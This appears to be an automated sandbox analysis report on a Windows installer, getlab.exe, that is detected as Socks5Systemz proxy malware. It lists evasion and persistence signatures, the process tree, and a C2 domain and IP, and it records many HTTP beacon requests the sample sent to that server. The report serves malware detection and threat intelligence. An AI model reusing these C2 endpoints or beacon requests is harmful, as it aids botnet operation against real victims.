Windows Analysis Report
getlab.exe

Overview

General Information

Sample name: getlab.exe
Analysis ID: 1565505
MD5: 15bd54ed3324a464c1deb1a883e7649e
SHA1: 7a6853de5875b347fe48afb232d249e44efeb879
SHA256: 7d728e3092520965203537354ccb0798292014885aecdefe1f22a988cb67661d
Tags: exe, Socks5Systemz, user-aachum

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • getlab.exe (PID: 5904 cmdline: "C:\Users\user\Desktop\getlab.exe" MD5: 15BD54ED3324A464C1DEB1A883E7649E)
    • getlab.tmp (PID: 5816 cmdline: "C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe" MD5: A0CFF52B882184452424B6E618FA061B)
      • net.exe (PID: 2520 cmdline: "C:\Windows\system32\net.exe" pause xl_gear_11293 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 5016 cmdline: C:\Windows\system32\net1 pause xl_gear_11293 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • xlgear32.exe (PID: 3320 cmdline: "C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i MD5: 9DC53D054BB2482253850DA5D8DFF405)
  • cleanup
{"C2 list": ["ayeyoji.ru"]}
Source | Rule | Description | Author | Strings
Source: C:\ProgramData\BridgeGamer\BridgeGamer.exe | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security
Source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Socks5Systemz | Description: Yara detected Socks5Systemz | Author: Joe Security
Source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Socks5Systemz | Description: Yara detected Socks5Systemz | Author: Joe Security
Source: 00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmp | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security
Source: Process Memory Space: xlgear32.exe PID: 3320 | Rule: JoeSecurity_Socks5Systemz | Description: Yara detected Socks5Systemz | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 4.0.xlgear32.exe.400000.0.unpack | Rule: JoeSecurity_DelphiSystemParamCount | Description: Detected Delphi use of System.ParamCount() | Author: Joe Security
                    No Sigma rule has matched

                    AV Detection

Source: xlgear32.exe.3320.4.memstrmin, Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ayeyoji.ru"]}
Source: getlab.exe, ReversingLabs: Detection: 18%
Source: getlab.exe, Virustotal: Detection: 36%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\BridgeGamer\BridgeGamer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFA8
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_0045D05C ArcFourCrypt,1_2_0045D05C
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_0045D074 ArcFourCrypt,1_2_0045D074
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Unpacked PE file: 4.2.xlgear32.exe.400000.0.unpack
Source: getlab.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\XLGear_is1
                    Source: Binary string: msvcp71.pdbx# source: is-K4GKL.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-Q00OL.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-K4GKL.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-4GRQU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-Q00OL.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp, Code function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80

                    Networking

                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49758 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49758 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49752 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49752 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49770 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49777 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49777 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49770 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49746 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49746 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49764 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49764 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49800 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49800 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49820 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49820 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49795 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49795 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49833 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49833 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49873 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49873 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49853 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49853 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49878 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49878 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49844 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49844 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49869 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49869 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49888 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49888 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49896 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49896 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49891 -> 185.208.158.202:80
                    Source: Malware configuration extractor | URLs: ayeyoji.ru
                    Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 89.105.201.183:2023
                    Source: Joe Sandbox View | IP Address: 185.208.158.202
                    Source: Joe Sandbox View | IP Address: 89.105.201.183
                    Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT
                    Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1 | Host: ayeyoji.ru | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1 | Host: ayeyoji.ru | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: unknown | TCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknown | UDP traffic detected without corresponding DNS query: 141.98.234.31
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02D972AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,4_2_02D972AB
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global traffic | DNS traffic detected: DNS query: ayeyoji.ru
                    Source: xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.202/
                    Source: xlgear32.exe, 00000004.00000002.2937621128.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937742375.000000000345C000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958
                    Source: xlgear32.exe, 00000004.00000002.2936299565.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
                    Source: getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
